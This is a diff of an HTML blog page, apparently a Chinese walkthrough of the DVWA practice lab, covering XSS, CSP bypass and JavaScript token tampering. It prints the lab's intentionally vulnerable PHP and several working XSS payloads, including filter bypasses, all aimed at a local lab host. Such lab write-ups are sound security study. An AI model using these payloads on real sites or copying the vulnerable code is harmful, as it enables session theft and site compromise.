-<li>方法2<br>或者就是用img标签或其他标签的特性去执行js代码，比如img标签的onerror事件，构造连接(通过加载一个不存在的图片出错出发javascript onerror事件,继续弹框，证明出来有xss)<br>`<a href="http://192.168.31.84:81/vulnerabilities/xss_d/?default=English%3E/option%3E%3C/select%3E%3Cimg%20src=#%20onerror=alert(/xss/)%3E&#39;" target="_blank" rel="noopener">http://192.168.31.84:81/vulnerabilities/xss_d/?default=English%3E/option%3E%3C/select%3E%3Cimg%20src=#%20onerror=alert(/xss/)%3E&#39;</a></li>
+<li>方法2<br>或者就是用img标签或其他标签的特性去执行js代码，比如img标签的onerror事件，构造连接(通过加载一个不存在的图片出错出发javascript onerror事件,继续弹框，证明出来有xss)<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"># 反射型xss</span><br><span class="line">## easy模式</span><br><span class="line">&gt; 反射型（非持久）：主要用于将恶意代码附加到URL地址的参数中，常用于窃取客户端cookie信息和钓鱼欺骗。</span><br><span class="line"></span><br><span class="line">查看源码，服务器直接把客户端的输入返回回来显示</span><br><span class="line">```php</span><br><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">header (&quot;X-XSS-Protection: 0&quot;);</span><br><span class="line"></span><br><span class="line">// Is there any input?</span><br><span class="line">if( array_key_exists( &quot;name&quot;, $_GET ) &amp;&amp; $_GET[ &apos;name&apos; ] != NULL ) &#123;</span><br><span class="line">    // Feedback for end user</span><br><span class="line">    echo &apos;&lt;pre&gt;Hello &apos; . $_GET[ &apos;name&apos; ] . &apos;&lt;/pre&gt;&apos;;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
+</li>
 </ol>
-<h1 id="反射型xss"><a href="#反射型xss" class="headerlink" title="反射型xss"></a>反射型xss</h1><h2 id="easy模式-8"><a href="#easy模式-8" class="headerlink" title="easy模式"></a>easy模式</h2><blockquote>
-<p>反射型（非持久）：主要用于将恶意代码附加到URL地址的参数中，常用于窃取客户端cookie信息和钓鱼欺骗。</p>
-</blockquote>
-<p>查看源码，服务器直接把客户端的输入返回回来显示<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">header (<span class="string">"X-XSS-Protection: 0"</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// Is there any input?</span></span><br><span class="line"><span class="keyword">if</span>( array_key_exists( <span class="string">"name"</span>, $_GET ) &amp;&amp; $_GET[ <span class="string">'name'</span> ] != <span class="keyword">NULL</span> ) &#123;</span><br><span class="line">    <span class="comment">// Feedback for end user</span></span><br><span class="line">    <span class="keyword">echo</span> <span class="string">'&lt;pre&gt;Hello '</span> . $_GET[ <span class="string">'name'</span> ] . <span class="string">'&lt;/pre&gt;'</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></p>
 <p><a href="http://192.168.31.84:81/vulnerabilities/xss_r/?name=%3Cscript%3Ealert(%27xss%27)%3C/script%3E" target="_blank" rel="noopener">http://192.168.31.84:81/vulnerabilities/xss_r/?name=%3Cscript%3Ealert(%27xss%27)%3C/script%3E</a></p>
 <h2 id="medium模式-8"><a href="#medium模式-8" class="headerlink" title="medium模式"></a>medium模式</h2><p>源码里检查了script标签<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">// Get input</span><br><span class="line">   $name = str_replace( &apos;&lt;script&gt;&apos;, &apos;&apos;, $_GET[ &apos;name&apos; ] );</span><br></pre></td></tr></table></figure></p>
-<p>str_replace这个函数是不区分大小写的，而且只替换一次<br>改成大写就可以了<script>alert(‘xss’)</script><br>或者嵌套&lt;scr<script>ipt&gt;alert(‘xss’)</script></p>
-<p>但对name审查没有这么严格，同样可以采用嵌套或大小写的方法：</p>
-<p>&lt;scr<script>ipt&gt;alert(‘fuck’)</script></p>
-<p><script>alert(‘fuck’)</script></p>
-<h1 id="存储型xss"><a href="#存储型xss" class="headerlink" title="存储型xss"></a>存储型xss</h1><h2 id="easy模式-9"><a href="#easy模式-9" class="headerlink" title="easy模式"></a>easy模式</h2><blockquote>
+<p>str_replace这个函数是不区分大小写的，而且只替换一次<br>改成大写就可以了<code>&lt;SCRIPT&gt;alert(&#39;xss&#39;)&lt;/script&gt;</code><br>或者嵌套<code>&lt;scr&lt;script&gt;ipt&gt;alert(&#39;xss&#39;)&lt;/script&gt;</code></p>
+<p>但对name审查没有这么严格，同样可以采用嵌套或大小写的方法：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;scr&lt;script&gt;ipt&gt;alert(&apos;fuck&apos;)&lt;/script&gt;</span><br><span class="line">&lt;SCRIPT&gt;alert(&apos;fuck&apos;)&lt;/script&gt;</span><br></pre></td></tr></table></figure></p>
+<h1 id="存储型xss"><a href="#存储型xss" class="headerlink" title="存储型xss"></a>存储型xss</h1><h2 id="easy模式-8"><a href="#easy模式-8" class="headerlink" title="easy模式"></a>easy模式</h2><blockquote>
 <p>“跨站点脚本（XSS）”攻击是一种注入问题，其中恶意脚本被注入到其他良性和可信赖的网站中。当攻击者使用Web应用程序将恶意代码（通常以浏览器端脚本的形式）发送给不同的最终用户时，就会发生XSS攻击。允许这些攻击成功的缺陷非常普遍，并且发生在使用输出中的用户输入的Web应用程序的任何地方，而不验证或编码它。</p>
 <p>攻击者可以使用XSS将恶意脚本发送给毫无戒心的用户。最终用户的浏览器无法知道该脚本不应该被信任，并将执行JavaScript。因为它认为脚本来自可靠来源，所以恶意脚本可以访问您的浏览器保留并与该站点一起使用的任何cookie，会话令牌或其他敏感信息。这些脚本甚至可以重写HTML页面的内容。</p>
 <p>XSS存储在数据库中。 XSS是永久性的，直到重置数据库或手动删除有效负载。</p>
 </blockquote>
-<p>查看源码<br>trim是去除掉用户输入内容前后的空格。stripslashes是去除反斜杠，两个只会去除一个。mysqli_real_escap_string过滤掉内容中特殊字符，像x00,n,r,,’,”,x1a等，来预防数据库攻击。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">if( isset( $_POST[ &apos;btnSign&apos; ] ) ) &#123;</span><br><span class="line">    // Get input</span><br><span class="line">    $message = trim( $_POST[ &apos;mtxMessage&apos; ] );</span><br><span class="line">    $name    = trim( $_POST[ &apos;txtName&apos; ] );</span><br><span class="line"></span><br><span class="line">    // Sanitize message input</span><br><span class="line">    $message = stripslashes( $message );</span><br><span class="line">    $message = ((isset($GLOBALS[&quot;___mysqli_ston&quot;]) &amp;&amp; is_object($GLOBALS[&quot;___mysqli_ston&quot;])) ? mysqli_real_escape_string($GLOBALS[&quot;___mysqli_ston&quot;],  $message ) : ((trigger_error(&quot;[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.&quot;, E_USER_ERROR)) ? &quot;&quot; : &quot;&quot;));</span><br><span class="line"></span><br><span class="line">    // Sanitize name input</span><br><span class="line">    $name = ((isset($GLOBALS[&quot;___mysqli_ston&quot;]) &amp;&amp; is_object($GLOBALS[&quot;___mysqli_ston&quot;])) ? mysqli_real_escape_string($GLOBALS[&quot;___mysqli_ston&quot;],  $name ) : ((trigger_error(&quot;[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.&quot;, E_USER_ERROR)) ? &quot;&quot; : &quot;&quot;));</span><br><span class="line"></span><br><span class="line">    // Update database</span><br><span class="line">    $query  = &quot;INSERT INTO guestbook ( comment, name ) VALUES ( &apos;$message&apos;, &apos;$name&apos; );&quot;;</span><br><span class="line">    $result = mysqli_query($GLOBALS[&quot;___mysqli_ston&quot;],  $query ) or die( &apos;&lt;pre&gt;&apos; . ((is_object($GLOBALS[&quot;___mysqli_ston&quot;])) ? mysqli_error($GLOBALS[&quot;___mysqli_ston&quot;]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . &apos;&lt;/pre&gt;&apos; );</span><br><span class="line"></span><br><span class="line">    //mysql_close();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
+<p>查看源码<br>trim是去除掉用户输入内容前后的空格。stripslashes是去除反斜杠，两个只会去除一个。mysqli_real_escap_string过滤掉内容中特殊字符，像x00,n,r,,’,”,x1a等，来预防数据库攻击。<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>( <span class="keyword">isset</span>( $_POST[ <span class="string">'btnSign'</span> ] ) ) &#123;</span><br><span class="line">    <span class="comment">// Get input</span></span><br><span class="line">    $message = trim( $_POST[ <span class="string">'mtxMessage'</span> ] );</span><br><span class="line">    $name    = trim( $_POST[ <span class="string">'txtName'</span> ] );</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Sanitize message input</span></span><br><span class="line">    $message = stripslashes( $message );</span><br><span class="line">    $message = ((<span class="keyword">isset</span>($GLOBALS[<span class="string">"___mysqli_ston"</span>]) &amp;&amp; is_object($GLOBALS[<span class="string">"___mysqli_ston"</span>])) ? mysqli_real_escape_string($GLOBALS[<span class="string">"___mysqli_ston"</span>],  $message ) : ((trigger_error(<span class="string">"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work."</span>, E_USER_ERROR)) ? <span class="string">""</span> : <span class="string">""</span>));</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Sanitize name input</span></span><br><span class="line">    $name = ((<span class="keyword">isset</span>($GLOBALS[<span class="string">"___mysqli_ston"</span>]) &amp;&amp; is_object($GLOBALS[<span class="string">"___mysqli_ston"</span>])) ? mysqli_real_escape_string($GLOBALS[<span class="string">"___mysqli_ston"</span>],  $name ) : ((trigger_error(<span class="string">"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work."</span>, E_USER_ERROR)) ? <span class="string">""</span> : <span class="string">""</span>));</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Update database</span></span><br><span class="line">    $query  = <span class="string">"INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );"</span>;</span><br><span class="line">    $result = mysqli_query($GLOBALS[<span class="string">"___mysqli_ston"</span>],  $query ) <span class="keyword">or</span> <span class="keyword">die</span>( <span class="string">'&lt;pre&gt;'</span> . ((is_object($GLOBALS[<span class="string">"___mysqli_ston"</span>])) ? mysqli_error($GLOBALS[<span class="string">"___mysqli_ston"</span>]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : <span class="keyword">false</span>)) . <span class="string">'&lt;/pre&gt;'</span> );</span><br><span class="line"></span><br><span class="line">    <span class="comment">//mysql_close();</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></p>
 <p>插入之后会成为页面的元素显示出来<br><code>&lt;div id=&quot;guestbook_comments&quot;&gt;Name: 11&lt;br /&gt;Message: 111&lt;br /&gt;&lt;/div&gt;</code><br>看一下提交的方式：<br><code>txtName=22&amp;mtxMessage=222&amp;btnSign=Sign+Guestbook</code><br>直接插入script语句，<code>txtName=22&lt;script&gt;alert(1)&lt;/script&gt;&amp;mtxMessage=222&amp;btnSign=Sign+Guestbook</code></p>
-<h2 id="medium模式-9"><a href="#medium模式-9" class="headerlink" title="medium模式"></a>medium模式</h2><p>源码中增加了几个函数的使用：</p>
-<ul>
-<li>$message = strip_tags(addslashes($message)); 剥去字符串中的 HTML、XML 以及 PHP 的标签。</li>
-<li>$message = htmlspecialchars( $message ); 把预定义的字符 “&lt;” （小于）和 “&gt;” （大于）转换为 HTML 实体：</li>
-<li>$name = str_replace( ‘<script>‘, ‘’, $name );</li>
-</ul>
-<h1 id="绕过安全策略"><a href="#绕过安全策略" class="headerlink" title="绕过安全策略"></a>绕过安全策略</h1><h2 id="easy模式-10"><a href="#easy模式-10" class="headerlink" title="easy模式"></a>easy模式</h2><blockquote>
+<h2 id="medium模式-9"><a href="#medium模式-9" class="headerlink" title="medium模式"></a>medium模式</h2><p>源码中增加了几个函数的使用：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">*  $message = strip_tags(addslashes($message)); 剥去字符串中的 HTML、XML 以及 PHP 的标签。</span><br><span class="line">* $message = htmlspecialchars( $message ); 把预定义的字符 &quot;&lt;&quot; （小于）和 &quot;&gt;&quot; （大于）转换为 HTML 实体：</span><br><span class="line">*  $name = str_replace( &apos;&lt;script&gt;&apos;, &apos;&apos;, $name );</span><br></pre></td></tr></table></figure></p>
+<h1 id="绕过安全策略"><a href="#绕过安全策略" class="headerlink" title="绕过安全策略"></a>绕过安全策略</h1><h2 id="easy模式-9"><a href="#easy模式-9" class="headerlink" title="easy模式"></a>easy模式</h2><blockquote>
 <p>内容安全策略（CSP）用于定义可以从中加载或执行脚本和其他资源的位置。本单元将引导您根据开发人员常见错误绕过策略。<br>这些漏洞都不是CSP中的实际漏洞，它们是实施漏洞的漏洞。</p>
 </blockquote>
-<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">$headerCSP = &quot;Content-Security-Policy: script-src &apos;self&apos; https://pastebin.com  example.com code.jquery.com https://ssl.google-analytics.com ;&quot;; // allows js from self, pastebin.com, jquery and google analytics.</span><br><span class="line"></span><br><span class="line">header($headerCSP);</span><br><span class="line"></span><br><span class="line"># https://pastebin.com/raw/R570EE00</span><br><span class="line"></span><br><span class="line">?&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">if (isset ($_POST[&apos;include&apos;])) &#123;</span><br><span class="line">$page[ &apos;body&apos; ] .= &quot;</span><br><span class="line">    &lt;script src=&apos;&quot; . $_POST[&apos;include&apos;] . &quot;&apos;&gt;&lt;/script&gt;</span><br><span class="line">&quot;;</span><br><span class="line">&#125;</span><br><span class="line">$page[ &apos;body&apos; ] .= &apos;</span><br><span class="line">&lt;form name=&quot;csp&quot; method=&quot;POST&quot;&gt;</span><br><span class="line">    &lt;p&gt;You can include scripts from external sources, examine the Content Security Policy and enter a URL to include here:&lt;/p&gt;</span><br><span class="line">    &lt;input size=&quot;50&quot; type=&quot;text&quot; name=&quot;include&quot; value=&quot;&quot; id=&quot;include&quot; /&gt;</span><br><span class="line">    &lt;input type=&quot;submit&quot; value=&quot;Include&quot; /&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line">&apos;;</span><br></pre></td></tr></table></figure>
-<p>会在页面里增加一个body<code>&lt;script src=&#39;&quot; . $_POST[&#39;include&#39;] . &quot;&#39;&gt;&lt;/script&gt;</code><br>这里在源码中规定了信任的脚本源：<br><code>script-src &#39;self&#39; https://pastebin.com  example.com code.jquery.com https://ssl.google-analytics.com ;&quot;; // allows js from self, pastebin.com, jquery and google analytics.</code><br>输入源码中提示的<a href="https://pastebin.com/raw/R570EE00，弹窗成功">https://pastebin.com/raw/R570EE00，弹窗成功</a></p>
+<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">$headerCSP = <span class="string">"Content-Security-Policy: script-src 'self' https://pastebin.com  example.com code.jquery.com https://ssl.google-analytics.com ;"</span>; <span class="comment">// allows js from self, pastebin.com, jquery and google analytics.</span></span><br><span class="line"></span><br><span class="line">header($headerCSP);</span><br><span class="line"></span><br><span class="line"><span class="comment"># https://pastebin.com/raw/R570EE00</span></span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span> ($_POST[<span class="string">'include'</span>])) &#123;</span><br><span class="line">$page[ <span class="string">'body'</span> ] .= <span class="string">"</span></span><br><span class="line"><span class="string">    &lt;script src='"</span> . $_POST[<span class="string">'include'</span>] . <span class="string">"'&gt;&lt;/script&gt;</span></span><br><span class="line"><span class="string">"</span>;</span><br><span class="line">&#125;</span><br><span class="line">$page[ <span class="string">'body'</span> ] .= <span class="string">'</span></span><br><span class="line"><span class="string">&lt;form name="csp" method="POST"&gt;</span></span><br><span class="line"><span class="string">    &lt;p&gt;You can include scripts from external sources, examine the Content Security Policy and enter a URL to include here:&lt;/p&gt;</span></span><br><span class="line"><span class="string">    &lt;input size="50" type="text" name="include" value="" id="include" /&gt;</span></span><br><span class="line"><span class="string">    &lt;input type="submit" value="Include" /&gt;</span></span><br><span class="line"><span class="string">&lt;/form&gt;</span></span><br><span class="line"><span class="string">'</span>;</span><br></pre></td></tr></table></figure>
+<p>会在页面里增加一个body<code>&lt;script src=&#39;&quot; . $_POST[&#39;include&#39;] . &quot;&#39;&gt;&lt;/script&gt;</code><br>这里在源码中规定了信任的脚本源：<br><code>script-src &#39;self&#39; https://pastebin.com  example.com code.jquery.com https://ssl.google-analytics.com ;&quot;; // allows js from self, pastebin.com, jquery and google analytics.</code><br>输入源码中提示的<a href="https://pastebin.com/raw/R570EE00，弹窗成功" target="_blank" rel="noopener">https://pastebin.com/raw/R570EE00，弹窗成功</a></p>
 <h2 id="medium模式-10"><a href="#medium模式-10" class="headerlink" title="medium模式"></a>medium模式</h2><p>如果你要使用 script 标签加载 javascript, 你需要指明其 nonce 值<br><code>$headerCSP = &quot;Content-Security-Policy: script-src &#39;self&#39; &#39;unsafe-inline&#39; &#39;nonce-TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=&#39;;&quot;;</code><br>比如：<br><code>&lt;script nonce=&quot;TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=&quot;&gt;alert(1)&lt;/script&gt;</code></p>
-<h1 id="JavaScript-Attacks"><a href="#JavaScript-Attacks" class="headerlink" title="JavaScript Attacks"></a>JavaScript Attacks</h1><h2 id="easy模式-11"><a href="#easy模式-11" class="headerlink" title="easy模式"></a>easy模式</h2><blockquote>
+<h1 id="JavaScript-Attacks"><a href="#JavaScript-Attacks" class="headerlink" title="JavaScript Attacks"></a>JavaScript Attacks</h1><h2 id="easy模式-10"><a href="#easy模式-10" class="headerlink" title="easy模式"></a>easy模式</h2><blockquote>
 <p>本节中的攻击旨在帮助您了解JavaScript在浏览器中的使用方式以及如何操作它。攻击可以通过分析网络流量来进行，但这不是重点，也可能要困难得多。<br>只需提交“成功”一词即可赢得关卡。显然，它并不那么容易，每个级别实现不同的保护机制，页面中包含的JavaScript必须进行分析，然后进行操作以绕过保护。</p>
 </blockquote>
 <p>提示我们Submit the word “success” to win.但是输入success却返回Invalid token.说明token值不对劲，后台应该是比较输入的字符串与‘success’。<br>查看源码发现token值是在前台计算的，md5(rot13(phrase))<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">function generate_token() &#123;</span><br><span class="line">    var phrase = document.getElementById(&quot;phrase&quot;).value;</span><br><span class="line">    document.getElementById(&quot;token&quot;).value = md5(rot13(phrase));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">generate_token();</span><br></pre></td></tr></table></figure></p>
@@ -576,7 +562,7 @@
 <p>把值给隐藏的元素<code>&lt;input type=&quot;hidden&quot; name=&quot;token&quot; value=&quot;8b479aefbd90795395b3e7089ae0dc09&quot; id=&quot;token&quot;&gt;</code><br>然后提交success</p>
 <h2 id="medium模式-11"><a href="#medium模式-11" class="headerlink" title="medium模式"></a>medium模式</h2><p>生成token的代码在js文件中<br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">do_something</span>(<span class="params">e</span>) </span>&#123;</span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">var</span> t = <span class="string">""</span>, n = e.length - <span class="number">1</span>; n &gt;= <span class="number">0</span>; n--) t += e[n];</span><br><span class="line">    <span class="keyword">return</span> t</span><br><span class="line">&#125;</span><br><span class="line">setTimeout(<span class="function"><span class="keyword">function</span> (<span class="params"></span>) </span>&#123;</span><br><span class="line">    do_elsesomething(<span class="string">"XX"</span>)</span><br><span class="line">&#125;, <span class="number">300</span>);</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">do_elsesomething</span>(<span class="params">e</span>) </span>&#123;</span><br><span class="line">    <span class="built_in">document</span>.getElementById(<span class="string">"token"</span>).value = do_something(e + <span class="built_in">document</span>.getElementById(<span class="string">"phrase"</span>).value + <span class="string">"XX"</span>)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
 <p>输入success，然后控制台运行do_elsesomething(“XX”)就可以拿到token</p>
-</script></li></ul>
+
       
     </div>
     
@@ -812,7 +798,7 @@
             
 
             
-              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#搭建环境"><span class="nav-text">搭建环境</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#暴力破解"><span class="nav-text">暴力破解</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#easy模式"><span class="nav-text">easy模式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#medium模式"><span class="nav-text">medium模式</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#命令执行"><span class="nav-text">命令执行</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#easy模式-1"><span class="nav-text">easy模式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#medium模式-1"><span class="nav-text">medium模式</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#CSRF"><span class="nav-text">CSRF</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#easy模式-2"><span class="nav-text">easy模式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#medium模式-2"><span class="nav-text">medium模式</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#文件包含"><span class="nav-text">文件包含</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#easy模式-3"><span class="nav-text">easy模式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#medium模式-3"><span class="nav-text">medium模式</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#文件上传"><span class="nav-text">文件上传</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#easy模式-4"><span class="nav-text">easy模式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#medium模式-4"><span class="nav-text">medium模式</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SQL注入"><span class="nav-text">SQL注入</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#easy模式-5"><span class="nav-text">easy模式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#medium模式-5"><span class="nav-text">medium模式</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SQL盲注"><span class="nav-text">SQL盲注</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#弱session-id"><span class="nav-text">弱session-id</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#easy模式-6"><span class="nav-text">easy模式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#medium模式-6"><span class="nav-text">medium模式</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#基于DOM的XSS"><span class="nav-text">基于DOM的XSS</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#easy模式-7"><span class="nav-text">easy模式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#medium模式-7"><span class="nav-text">medium模式</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#反射型xss"><span class="nav-text">反射型xss</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#easy模式-8"><span class="nav-text">easy模式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#medium模式-8"><span class="nav-text">medium模式</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#存储型xss"><span class="nav-text">存储型xss</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#easy模式-9"><span class="nav-text">easy模式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#medium模式-9"><span class="nav-text">medium模式</span></a></li></ol></li></ol></div>
+              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#搭建环境"><span class="nav-text">搭建环境</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#暴力破解"><span class="nav-text">暴力破解</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#easy模式"><span class="nav-text">easy模式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#medium模式"><span class="nav-text">medium模式</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#命令执行"><span class="nav-text">命令执行</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#easy模式-1"><span class="nav-text">easy模式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#medium模式-1"><span class="nav-text">medium模式</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#CSRF"><span class="nav-text">CSRF</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#easy模式-2"><span class="nav-text">easy模式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#medium模式-2"><span class="nav-text">medium模式</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#文件包含"><span class="nav-text">文件包含</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#easy模式-3"><span class="nav-text">easy模式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#medium模式-3"><span class="nav-text">medium模式</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#文件上传"><span class="nav-text">文件上传</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#easy模式-4"><span class="nav-text">easy模式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#medium模式-4"><span class="nav-text">medium模式</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SQL注入"><span class="nav-text">SQL注入</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#easy模式-5"><span class="nav-text">easy模式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#medium模式-5"><span 